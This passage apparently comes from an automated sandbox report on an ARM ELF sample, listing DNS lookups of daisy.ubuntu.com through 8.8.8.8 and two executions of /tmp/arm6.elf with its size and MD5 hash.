                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Apr 14, 2025 09:43:19.599184990 CEST192.168.2.148.8.8.80xebdfStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                        Apr 14, 2025 09:43:19.599241972 CEST192.168.2.148.8.8.80x8017Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 14, 2025 09:43:19.705653906 CEST8.8.8.8192.168.2.140xebdfNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                        Apr 14, 2025 09:43:19.705653906 CEST8.8.8.8192.168.2.140xebdfNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                        System Behavior

                        Start time (UTC):07:43:13
                        Start date (UTC):14/04/2025
                        Path:/tmp/arm6.elf
                        Arguments:/tmp/arm6.elf
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):07:43:16
                        Start date (UTC):14/04/2025
                        Path:/tmp/arm6.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1